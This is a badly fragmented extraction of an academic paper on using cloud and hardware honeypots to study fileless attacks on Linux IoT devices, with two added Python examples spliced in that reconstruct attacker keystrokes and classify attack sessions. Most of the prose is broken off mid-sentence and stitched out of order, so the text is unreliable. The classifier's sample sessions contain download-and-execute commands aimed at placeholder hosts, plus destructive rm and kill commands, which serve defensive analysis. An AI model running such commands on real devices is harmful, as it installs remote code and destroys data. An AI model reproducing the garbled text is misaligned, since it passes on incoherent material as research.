# Understanding Fileless Attacks on Linux-based IoT Devices with HoneyCloud

Fan Dang[1], Zhenhua Li[1], Yunhao Liu[1,2], Ennan Zhai[3], Qi Alfred Chen[4], Tianyin Xu[5], Yan Chen[6], Jingyu Yang[7]

1 Tsinghua University, 2 Michigan State University, 3 Alibaba Group, 4 UC Irvine, 5 University of Illinois Urbana-Champaign, 6 Northwestern University, 7 Tencent Anti-Virus Lab

MobiSys ’19, June 17–21, 2019, Seoul, South Korea

### ABSTRACT

based fingerprint sharing. Recently, fileless attacks—attacks that do

### CCS CONCEPTS

- Security and privacy → **Hardware attacks and countermeasures; Mobile and wireless security.**

**ACM Reference Format:** based IoT Devices with HoneyCloud. In *MobiSys ’19: ACM International Conference on Mobile Systems, Applications, and Services, June 17–21, 2019, Seoul, South Korea*. ACM, New York, NY, USA, 13 pages. https://doi.org/10.1145/nnnnnnn.nnnnnnn

### 1 INTRODUCTION

tomation [49], etc. In particular, the majority of today’s IoT devices have employed Linux (e.g., OpenWrt and Raspbian) for its preva

categories: malware-based attacks and fileless attacks. Threats from malware-based attacks (e.g., Mirai, PNScan, and

been developed. For instance, the hash (e.g., MD5 or SHA-n) of

28, 74], e.g., McAfee Labs reports that fileless attacks surged by

### 1.1 Study Methodology (§2)

To understand Linux-based IoT attacks in the wild, we use honeypots [67], which are known to be an effective method for captur-

therefore, attempt to explore a cheap and scalable approach to ef

ertheless, this approach is subject to several practical issues. First,
so as not to miss the relatively rare fileless attacks. Second, they
attacks. Finally, they have to conform with diverse policies imposed

maintenance fee of a software honeypot (∼6 US dollars) is 12.5× less than that of a hardware honeypot (∼75 US dollars).
More impor

### 1.2 Findings and Implications (§3)

which 28 million successfully logged in and enabled attacks.[1] Among these successful attacks, 1.5 million are identified as fileless attacks,[2]

- We introduce the first taxonomy for fileless IoT attacks by correlating multi-source information. For lack of malware
- Fileless attacks aggravate the threats to IoT devices by introducing stealthy reconnaissance methods and unique types of IoT attacks. On one side, we notice that 39.4% of the
  performing de-immunization operations (e.g., shut down the fire
- IoT attacks in the wild are using various types of information to determine device authenticity. According to our
  commands like lscpu to acquire sensitive system information.
- We discover new security challenges posed by fileless attacks and propose new defense directions. While leaving
  rm, kill, ps, and passwd, which are enabled by default in our

[1] The rest of connections (i.e., 89.4% of the observed suspicious connections) cannot
[2] Different from previous studies on IoT attacks where fileless attacks were scarcely

**Figure 1: Deployment overview of our system.**

**Figure 2: Geo-distribution of our deployed software honeypots.**

### 2 HONEYPOT DEPLOYMENT

network and monitored, when we expect it to be broken into and
typically suspicious[3].

### 2.1 Overview

**Hardware IoT honeypots.**
US dollars per month for Internet connections. Given that the lifes

**Software IoT honeypots.** The insights and experiences collected
ware honeypots (i.e., one VM instance hosts one software honeypot).
CPU @ ∼2.2 GHz, 512 MiB of memory, 10–40 GB of storage, and costs ∼6 US dollars per month.

[3] For honeypots deployed in public clouds, the situation can be slightly different since
For all the 108 software honeypots, the monthly infrastructure fee is ∼640 US dollars.

### 2.2 Hardware IoT Honeypots

**Design and implementation.**

**Table 1: Specifications of our hardware IoT honeypot deployment.**

fee for the two devices reaches 80 and 30 US dollars per month
Services to be compromised
devices cannot share an Internet connection (e.g., through NAT),

**Figure 3: System architecture of our developed hardware IoT honeypot based on Raspberry Pi.**

We expose ash—a shell provided by BusyBox [5]—to attackers, so as
password of the root user is set to root by modifying the shadow
we capture threat information of this attack and then reset the honeypot. Our implementation utilizes initramfs [2] to achieve an
If our hardware honeypot is unavailable (i.e., it does not report data to the Data Collector, or we cannot log in to it), we reboot the
rebooting, we observed that attackers typically use malware (e.g.,

**Experiences.**

**Implications to software IoT honeypots.**
dollars per month, which is significantly (13×) lower than that of
tem information via commands like lscpu and cat /proc/cpuinfo,
real system information (e.g., CPU information), making the software honeypots look like real IoT devices (detailed in §2.3.1). Second, we notice that 187 attacks used commands like lsusb (listing con
enable common buses to ensure the fidelity (detailed in §2.3.1).
### 2.3 Software IoT Honeypots

**Figure 4: Architectural overview of our system, as well as the internal structure of a software IoT honeypot.**

three modules: High Fidelity Maintainer (§2.3.1), Shell Interceptor and Inference Terminal (§2.3.2), and Access Controller (§2.3.3). The

*2.3.1 High Fidelity Maintainer.* The High Fidelity Maintainer im-

**Customizing QEMU configurations.** To enhance the fidelity of
that of the emulated IoT device. As we use initramfs to achieve
we initially enable two common buses, i.e., USB and I²C, supported
attackers are able to use lsusb to show the information about USB buses in the system, and they can see an i2c node in the /dev.

**Masking sensitive system information.**
and kernel information (e.g., by checking /proc) [22], we mask
pot, we forge /proc/cpuinfo in OpenWrt and make it look like a

**VM instances rearrangement among public clouds.** Since we
notice that all the eight public clouds offer the option of elastic IP ad

(a) Deployment statistics during 06/15/2017–12/14/2017
(b) Deployment statistics during 12/15/2017–06/14/2018

**Table 2: Deployment changes of HoneyCloud. Here “#” denotes the number of deployed software honeypots.**

*2.3.2 Shell Interceptor & Inference Terminal.* We build two mod-

**Shell Interceptor.**
detects the packet type, among which we focus on CHANNEL_DATA (the actual terminal data) and CHANNEL_WINDOW_ADJUST (the resize

**Inference Terminal.** Although the Shell Interceptor has acquired
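The Shell Interceptor described in §2.3.2 obtains the attacker's raw CHANNEL_DATA bytes, which is a stream of keystrokes rather than finished commands; the command the attacker actually ran has to be reconstructed by replaying cursor movement and control characters (the paper's own illustration: the keys a, b, ←, c yield acb, not abc). The block below is an added example, not code from the paper or from HoneyCloud, showing a dependency-free line-editor model that does this reconstruction for the client-to-server direction. It handles the CSI sequences a client sends for the arrow, Home, End and Delete keys, plus Backspace, Ctrl-U, Ctrl-C, Ctrl-A, Ctrl-E and Enter. The erase and reset sequences of Table 3 travel in the opposite direction (shell to terminal) and are deliberately not interpreted here; HoneyCloud handles that side by feeding the shell output to pyte, which this block does not use. Because the model works on what the client typed rather than on what the shell echoed, input the shell suppresses (the password typed into passwd) is preserved. The keystroke captures in the usage section are constructed for illustration.

```python
"""Reconstruct attacker command lines from the raw client-to-server keystrokes
carried in SSH CHANNEL_DATA packets (added example; not HoneyCloud code).

The bytes are replayed through a model of a line editor: printable characters
are inserted at the cursor, cursor keys move it, Enter submits the line.  This
recovers what the attacker ran (a, b, <-, c gives "acb", not "abc") and keeps
input the shell never echoes, such as the password typed into passwd.
"""

ESC = 0x1B


def _apply_csi(params: str, final: str, line: list, cursor: int) -> int:
    """Apply one CSI sequence (ESC [ params final) as sent by a client's keyboard.

    Only key sequences are modelled.  Erase/reset sequences such as those in
    Table 3 flow the other way (shell to terminal) and belong to the terminal
    emulator side, so they are ignored here.  Returns the new cursor position.
    """
    if final == "D":                              # Left arrow
        return max(0, cursor - 1)
    if final == "C":                              # Right arrow
        return min(len(line), cursor + 1)
    if final == "H":                              # Home
        return 0
    if final == "F":                              # End
        return len(line)
    if final == "~" and params == "3":            # Delete: remove char under cursor
        if cursor < len(line):
            del line[cursor]
        return cursor
    # Up/Down (history) and anything else: the history contents are not in the
    # input stream, so there is nothing safe to replay.
    return cursor


def reconstruct_commands(raw: bytes) -> list:
    """Return one string per command line submitted in the keystroke stream."""
    commands = []
    line, cursor = [], 0
    i, n = 0, len(raw)
    while i < n:
        b = raw[i]
        if b == ESC:
            if i + 1 < n and raw[i + 1] == ord("["):
                j = i + 2
                while j < n and 0x30 <= raw[j] <= 0x3F:   # parameter bytes: 0-9 ; ?
                    j += 1
                if j >= n:                                # sequence cut off by end of capture
                    break
                cursor = _apply_csi(raw[i + 2:j].decode("ascii"), chr(raw[j]), line, cursor)
                i = j + 1
            else:
                i += 2                                    # ESC + one byte (Alt-x): skip
            continue
        if b in (0x0D, 0x0A):                             # Enter submits the line
            commands.append("".join(line))
            line, cursor = [], 0
            if b == 0x0D and i + 1 < n and raw[i + 1] == 0x0A:
                i += 1                                    # CR LF is one Enter
        elif b in (0x08, 0x7F):                           # Backspace
            if cursor > 0:
                cursor -= 1
                del line[cursor]
        elif b == 0x15:                                   # Ctrl-U: kill to start of line
            del line[:cursor]
            cursor = 0
        elif b == 0x03:                                   # Ctrl-C: discard the line
            line, cursor = [], 0
        elif b == 0x01:                                   # Ctrl-A: start of line
            cursor = 0
        elif b == 0x05:                                   # Ctrl-E: end of line
            cursor = len(line)
        elif 0x20 <= b < 0x7F:                            # printable ASCII: insert at cursor
            line.insert(cursor, chr(b))
            cursor += 1
        # Tab completion and other control bytes are not modelled.
        i += 1
    if line:                                              # session ended before Enter
        commands.append("".join(line))
    return commands


if __name__ == "__main__":
    # Constructed keystroke captures for illustration, not real honeypot data.
    for capture in (b"ab\x1b[Dc\r",
                    b"cat /etc/shadwo\x1b[D\x1b[D\x1b[3~\x1b[Cw\r",
                    b"passwd\rroot\rroot\r"):
        print(reconstruct_commands(capture))
```

This only works on plaintext, i.e., after the Decryptor stage of the Shell Interceptor has recovered the channel data. Tab completion and Up-arrow history recall cannot be resolved from the input direction alone, which is exactly why the paper also replays the shell's output through a terminal emulator: the echoed screen shows the completed command even when the keystrokes do not.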
**Figure 5: Working flow chart of the Shell Interceptor.** (Labels recovered from the figure: Attacker, Input, SSH Packet, Decryptor, Plaintext, CHANNEL_DATA, Inference Terminal, Shell Trace, CHANNEL_WINDOW_ADJUST, Window Resize event, Data Aggregator, Other Packet Processor, Encryptor.)

**Table 3: Special escape sequences.**

| Sequence | Meaning (standard VT100/ECMA-48 definition) |
|---|---|
| 1Bh c | RIS: reset the terminal to its initial state |
| 1Bh [ H | CUP without parameters: move the cursor to the home position |
| 1Bh [ n J | ED: erase in display; n selects which part of the screen |
| 1Bh [ n K | EL: erase in line; n selects which part of the line |

{“a”, “b”, “←”, “c”} should result in “acb”. If we simply ignore the con
“abc”. Thereby, we need to recover the context of interactions. To fulfill this, we feed the shell and terminal data into pyte [13], a VTxxx
flushes old content), we modify the program of pyte to recover the hidden inputs (e.g., passwords).
attacker rather than an automatic script (i.e., the authenticity of the

**Evidence collection.**

- CPU usage as an important indicator of the execution of complex
- Process list which can track any unintentional, suspicious process
- Network packets. We first use libpcap to capture almost the full

**Figure 6: Heartbeat-based failure recovery.** (Labels recovered from the figure: Inside QEMU: QEMU with OpenWrt, Beacon; Outside QEMU: Honeypot Node, Reset Manager, Heartbeat, Connect, Reset; MQTT Heartbeat to the Back-end Controller, Reset.)

*2.3.3 Access Controller.* Once a software honeypot is compromised
benign requests (e.g., DNS packets), while relaxed policies would

*2.3.4 Reset Manager.*
We built heartbeat-based reset to periodically
malware (e.g., Mirai) can kill the process of the SSH/Telnet server;

### 3 FINDINGS AND IMPLICATIONS

### 3.1 General Characteristics and Statistics

**Figure 7: General working flows of captured attacks.** (Labels recovered from the figure: phases Intrusion, Infection, Typical Monetization; boxes Weak Password, Security Flaws, Download Malware, Set up Port Forward, DoS, Telnet/SSH Scan, Ransom.)

the intrusion phase, most malware uses brute-force methods (e.g.,
infection phase where wget and tftp are typically used to download
to the command and control (a.k.a., C&C) server to wait for the
tioned in §2, these connections led to 1.6 million effective attacks[4],
average, showing that attacks on IoT devices are actually frequent at present.

(e.g., CPU bugs and model-specific registers [46, 65]) and advanced techniques (e.g., execution analysis [34]) to infer the VM identity of
reach our honeypots in the public clouds except Alibaba Cloud.[5]

### 3.2 Malware-based Attacks

In addition, we find that the vast majority (∼92.1%) of malware

[4] A successful login is counted as an effective attack. If any file is downloaded (via wget),
[5] After performing port scanning using nmap [27], Alibaba Cloud blocked our SSH

(a) Attacks captured by hardware honeypots.
(b) Attacks captured by software honeypots.

**Figure 8: Attacks captured by our hardware and software honeypots in HoneyCloud. FS is short for filesystem and CMD is**
Note that in Figure 8b we only plot the new connection lines relative to those in Figure 8a.** collected malware (e.g., Mirai, Dofloo, and Ganiw) is usually capable total), MIPS [6] (Big & Little Endian, 25.7% in total), PowerPC [7] (9.2%), and SPARC [8] (8.9%). This highlights the pressing need for a flexible, ### 3.3 Fileless Attack Taxonomy - Type I: Occupying end systems (1.8%), e.g., by altering the password of an IoT device (via passwd). Once the password is changed, - Type II: Damaging system data (54.4%), e.g., by removing or altering certain configuration files or programs (via rm and dd). 6Broadcom and Atheros have made lots of MIPS SoCs for WiFi routers. Ingenic also 7There are a number of PowerPC-based set-top boxes and game consoles like Wii and 8SPARC-based SoCs have been produced over years, such as LEON. opens the watchdog device (/dev/watchdog) and makes several - Type III: Preventing system monitoring/auditing services (8.5%), _e.g., by killing the watchdog processes or stopping certain ser-_ vices (via kill and service). For instance, after stopping the - Type IV: Retrieving system information (7.4%), e.g., by getting the hardware information (via lscpu) and the system information (via uname, netstat, ps, and free). Such information may be useful for launching further attacks for specific purposes, e.g., - Type V: Stealing valuable data (23.5%), e.g., by reading passwords and/or certain configuration files (via cat). Note that although passwords stored in /etc/shadow are salted and hashed, the at - Type VI: Launching network attacks (0.3%), e.g., by sending mal web servers (via wget and curl) to launch DoS attacks [31, 32]. - Type VII: Issuing other shell commands for unclear reasons to us, including who, help, lastlog, sleep, and so on. 
  For some commands like who and lastlog, we speculate that the attacker
- Type VIII: Conducting attacks where no shell command is involved (0.3%). A typical example, referred to as SSH Tunneling Attack, is demonstrated in Figure 9a, where the attacker has
  on the compromised device (i.e., our honeypots, see the SSH
  the attack we observed.[9] Also, we learned that this attack is not

[9] Since the collected data were encrypted, we did not have direct, ideal evidence but

**Figure 9: (a) Details of the SSH Tunneling Attack, (b) the procedure describing how we identify the SSH Tunneling Attack, and (c) how an attacker can launch an SSH Tunneling Attack against a target.**

of which are pretty powerful and stealthy (e.g., the SSH Tunneling
weak authentication issue of today’s IoT devices, i.e., many widely

Solely rm is used by 48% of the fileless attacks, while all the other

**Figure 10: Usage frequency of the shell commands.**

### 3.4 Key Insights for Fileless Attacks

attacks are launched through a small set of commands: rm, kill, ps, and passwd, which are enabled by default in our honeypots (and
device. For example, the kill command is typically designed for
kill shell command.
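The taxonomy of §3.3 and the §3.4 observation that fileless attacks are launched through a small set of commands enabled by default together suggest a straightforward session classifier: split each captured command line into simple commands, normalise busybox prefixes and absolute paths, mark the session as malware-based if any command saves a download to disk (footnote 4 counts a download via wget as a malware-based attack), and otherwise map the commands onto Types I to VII, with a login that issues no shell command at all as Type VIII. The following is an added example written for this page, not the authors' analysis code. The command-to-type table contains exactly the commands the paper names for each type. Three things are my assumptions rather than the paper's: the rule for deciding whether wget or curl writes a file (wget saves by default unless `-O -` or `--spider`; curl saves only with `-o`/`-O`), the treatment of `cat /proc/*` as Type IV reconnaissance versus other `cat` targets as Type V theft, and the sample sessions, which are constructed and use documentation IP ranges. The SSH tunneling variant of Type VIII is invisible at this layer, since port-forward requests never appear in the command stream; an empty command list is the only hint the classifier can give.

```python
"""Classify captured honeypot sessions by the fileless attack taxonomy of §3.3.

Added example, not the paper's analysis code.  A session is the list of
command lines an attacker submitted after logging in.
"""
import re
import shlex
from collections import Counter

# Commands the paper names as examples of each fileless attack type.
COMMAND_TYPE = {
    "passwd": "I",                                   # occupying the end system
    "rm": "II", "dd": "II",                          # damaging system data
    "kill": "III", "service": "III",                 # stopping monitoring/auditing
    "lscpu": "IV", "lsusb": "IV", "uname": "IV",     # retrieving system information
    "netstat": "IV", "ps": "IV", "free": "IV",
    "wget": "VI", "curl": "VI",                      # network attacks (if nothing is saved)
    "who": "VII", "help": "VII", "lastlog": "VII", "sleep": "VII",
}

# Control operators separating simple commands in the one-liners bots send.
_SPLIT = re.compile(r"\s*(?:;|&&|\|\||\||\n)\s*")


def split_commands(line: str) -> list:
    """One argv per simple command; `busybox rm` and `/bin/rm` both become `rm`.

    Splitting is textual (not quoting-aware), which is adequate for bot payloads.
    """
    argvs = []
    for piece in _SPLIT.split(line):
        try:
            argv = shlex.split(piece)
        except ValueError:                           # unbalanced quotes
            argv = piece.split()
        if not argv:
            continue
        if argv[0] == "busybox" and len(argv) > 1:
            argv = argv[1:]
        argv[0] = argv[0].rsplit("/", 1)[-1]
        argvs.append(argv)
    return argvs


def writes_file(argv: list) -> bool:
    """Assumption, not from the paper: does this command save a download to disk?"""
    cmd = argv[0]
    if cmd == "tftp":
        return True
    if cmd == "wget":
        if "--spider" in argv:                       # fetches nothing
            return False
        if "-O" in argv:                             # `-O -` streams to stdout
            i = argv.index("-O")
            return not (i + 1 < len(argv) and argv[i + 1] == "-")
        return True                                  # wget saves to a file by default
    if cmd == "curl":                                # curl saves only when asked
        return any(a in ("-o", "-O", "--output", "--remote-name") for a in argv[1:])
    return False


def classify_command(argv: list) -> str:
    """Map one simple command to a type I..VII."""
    if argv[0] == "cat":
        # assumption: cat /proc/* is reconnaissance (IV); /etc/shadow etc. is theft (V)
        return "IV" if any(a.startswith("/proc/") for a in argv[1:]) else "V"
    return COMMAND_TYPE.get(argv[0], "VII")          # unknown commands: "other"


def classify_session(lines: list) -> dict:
    """Decide fileless vs. malware-based and collect the fileless types seen."""
    argvs = [argv for line in lines for argv in split_commands(line)]
    names = [argv[0] for argv in argvs]
    if not argvs:                                    # login, no shell command: Type VIII
        return {"fileless": True, "types": {"VIII"}, "commands": names}
    if any(writes_file(argv) for argv in argvs):     # footnote 4: a download = malware-based
        return {"fileless": False, "types": set(), "commands": names}
    return {"fileless": True, "types": {classify_command(a) for a in argvs}, "commands": names}


def type_frequency(sessions: list) -> Counter:
    """How many fileless sessions show each type (cf. the §3.3 percentages)."""
    counts = Counter()
    for session in sessions:
        result = classify_session(session)
        if result["fileless"]:
            counts.update(result["types"])
    return counts


if __name__ == "__main__":
    # Constructed sessions, not real captures; 198.51.100.0/24 and 203.0.113.0/24
    # are documentation address ranges.
    SESSIONS = [
        ["cat /proc/cpuinfo; lscpu", "kill -9 $(pidof watchdog)"],
        ["/bin/rm -rf /etc/config /overlay", "passwd root"],
        ["busybox wget http://198.51.100.7/bot.mips -O /tmp/x; chmod +x /tmp/x; /tmp/x"],
        ["wget -O - http://203.0.113.9/ | sh"],
        [],
    ]
    for session in SESSIONS:
        print(classify_session(session))
    print(type_frequency(SESSIONS))
```

Note what the fourth sample session shows: `wget -O - … | sh` fetches code and executes it without writing a file, so under the footnote 4 rule it is still fileless even though it relies on a download. A classifier that keys on the presence of wget alone would put it in the malware-based bucket and lose it from the fileless statistics.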
Thus, for a certain IoT device, if some of these
acquire system information before attacking the system (e.g., they
performing de-immunization operations (e.g., shut down the fire

### 3.5 New Security Challenges and Defense Directions

many IoT devices use a read-only filesystem (e.g., SquashFS [38])
mend logging, e.g., using a hybrid filesystem (e.g., OverlayFS [33]) or a versioning filesystem (e.g., Elephant [66]), this inevitability

**Figure 11: The IoTCheck work flow. Red texts denote that essential actions should be taken. Blue boxes represent the possible auditing schemes.** (Nodes recovered from the flow chart: Use strong password? (Yes/No); Unique strong password; Enable shell command history (using a small writable partition); Prevent public SSH access; Put most files in read-only filesystem; Default user is root? (Yes/No); Components all necessary? (Yes/No); Remove useless components; auditing schemes: Audit locally, Upload to the manufacturer, Upload to the community.)

We suggest that any IoT device unsuited to using a unique strong password (e.g., limited by the production and assembly process—

### 4 DISCUSSION ON LIMITATIONS

**Support of emerging IoT interfaces.** Although QEMU provides

**Robustness to the inference of VM identity.**
may leverage more in-depth information (e.g., CPU bugs and model-specific registers [46, 65]) and advanced techniques (e.g., execution

**In-depth analysis on advanced attacks.** HoneyCloud currently

### 5 RELATED WORK

### 5.1 Fileless Attacks

e.g., the Morris Internet worm, emerged [54]), fileless attacks had
based on their incursion methods. First, in the in-memory attacks,
programs [10].
A typical example is the EternalBlue attack, which ex
packets [30]. Second, in the non-PE (portable executable) file attacks,
systems (e.g., PowerShell and Microsoft Word) rather than PE files to launch attacks [51]. Third, there are dual-use system tools that
least, weak or stolen credentials are often used to intrude the victim

[10] Attackers can also pursue persistence of fileless attacks, e.g., by storing a malicious

### 5.2 Honeypot Solutions

puter systems (e.g., enabling a single host to claim up to 65536
server side), and thus is also called honeyclient. Targeting malware
Vrable et al. built an HIH farm named Potemkin [69]. While
good scalability (e.g., emulating over 64,000 honeypots using only a
IoTPOT systems, Minn et al. discover that Telnet-based attacks
et al. use machine learning techniques to acquire the behavioral knowledge of IoT honeypots [57]. Moreover, Gandhi et al. set up a

**Figure 12: Design tradeoff of honeypots.**

### 6 CONCLUSION

(e.g., Mirai) can quickly spread across IoT devices, they can be

### ACKNOWLEDGEMENT

### REFERENCES

[20] Key Trends from the IoT Developer Survey 2018. https://blog.benjamin-cabe.com/2018/04/17/key-trends-iot-developer-survey-2018
[29] Now
[30] NVD - CVE-2017-0143. https://nvd.nist.gov/vuln/detail/CVE-2017-0143. (Ac-
[35] SecurityBrief Asia - Rogue nations, IoT, fileless malware and drones: A new era
[42] webcamd: daemon which provide access to USB webcam, USB DVB, USB radio,
the Mirai Botnet. In *Proceedings of 26th USENIX Security Symposium (USENIX Security)*. USENIX Association, Vancouver, BC, 1093–1110.
ware. In *Proceedings of the 9th International Conference on Recent Advances in Intrusion Detection*.
Springer-Verlag, Berlin, Heidelberg, 165–184.
[45] Michele De Donno, Nicola Dragoni, Alberto Giaretta, and Angelo Spognardi. 2018. *Security and Communication Networks* 2018 (2018), 7178164:1–7178164:30.
[46] Peter Ferrie. 2007. Attacks on more virtual machine emulators. *Symantec Technology Exchange* 55 (2007).
lance on IoT Devices against Recent Threats. *Wireless Personal Communications*
Classification: A Survey. *Journal of Information Security* 05 (Jan 2014), 56–64.
of architectures and technologies. *IEEE Communications Magazine* 48, 6 (June
Build a Persistent, Asyncronous, and Fileless Backdoor. In *Black Hat*. Black Hat,
Commands Using Deep Neural Networks. In *Proceedings of the 2018 on Asia Conference on Computer and Communications Security*. ACM, New York, NY, USA,
[54] Brendan P. Kehoe. 1992. *Zen and the Art of the Internet*. Prentice-Hall, Inc., Upper
Detection Signatures Using Honeypots. *SIGCOMM Comput. Commun. Rev.* 34, 1
Consumer IoT Devices. In *Proceedings of the 2017 Workshop on Internet of Things Security and Privacy*. ACM, New York, NY, USA, 1–6. https://doi.org/10.1145/3139937.3139938
[57] Tongbo Luo, Zhaoyan Xu, Xing Jin, Yanhui Jia, and Xin Ouyang. 2017. IoTCandyJar: Towards an Intelligent-Interaction Honeypot for IoT Devices. In *Black Hat*.
eypot in Network Security: A Survey. In *Proceedings of the 2011 International Conference on Communication, Computing & Security*. ACM, New York, NY, USA,
malware. *Network Security* 2017, 4 (2017), 7–11. https://doi.org/10.1016/S1353-4858(17)30037-5
[60] Jose Nazario. 2009. PhoneyC: A Virtual Client Honeypot. In *Proceedings of the 2nd USENIX Conference on Large-scale Exploits and Emergent Threats: Botnets, Spyware, Worms, and More (LEET)*. USENIX Association.
[62] Yin Minn Pa Pa, Shogo Suzuki, Katsunari Yoshioka, Tsutomu Matsumoto,
of IoT Compromises. In *Proceedings of the 9th USENIX Conference on Offensive Technologies*.
USENIX Association, Berkeley, CA, USA, 9–9.
[63] Niels Provos. 2004. A Virtual Honeypot Framework. In *Proceedings of the 13th Conference on USENIX Security Symposium - Volume 13*. USENIX Association,
[64] Niels Provos and Thorsten Holz. 2010. *Virtual honeypots: from botnet tracking to intrusion detection*. Addison-Wesley.
tem Emulators. In *Proceedings of the 10th International Conference on Information Security*. Springer-Verlag, Berlin, Heidelberg, 1–18.
file system that never forgets. In *Proceedings of the 7th Workshop on Hot Topics in Operating Systems*. 2–7. https://doi.org/10.1109/HOTOS.1999.798369
[67] Lance Spitzner. 2003. *Honeypots: tracking hackers*. Vol. 1. Addison-Wesley Read
them. *Network Security* 2011, 8 (2011), 16–19.
Containment in the Potemkin Virtual Honeyfarm. In *Proceedings of the 20th ACM Symposium on Operating Systems Principles*. ACM, New York, NY, USA, 148–162.
[71] Candid Wueest and Himanshu Anand. 2017. *Living off the land and fileless attack techniques*. Technical Report. https://www.symantec.com/content/dam/symantec/docs/security-center/white-papers/istr-living-off-the-land-and-fileless-attack-techniques-en.pdf
[72] Vinod Yegneswaran, Paul Barford, and Vern Paxson. 2005. Using honeynets for internet situational awareness. In *Proceedings of the 4th Workshop on Hot Topics in Networks (HotNets)*. Citeseer, 17–22.
with WiFi. *Tsinghua Science and Technology* 20, 1 (Feb 2015), 1–6.
Attacks Using Keyboard Acoustic Emanations. In *Proceedings of the 2014 ACM SIGSAC Conference on Computer and Communications Security*. ACM, New York,
high-interaction honeypot principle. *Journal of China Institute of Communications*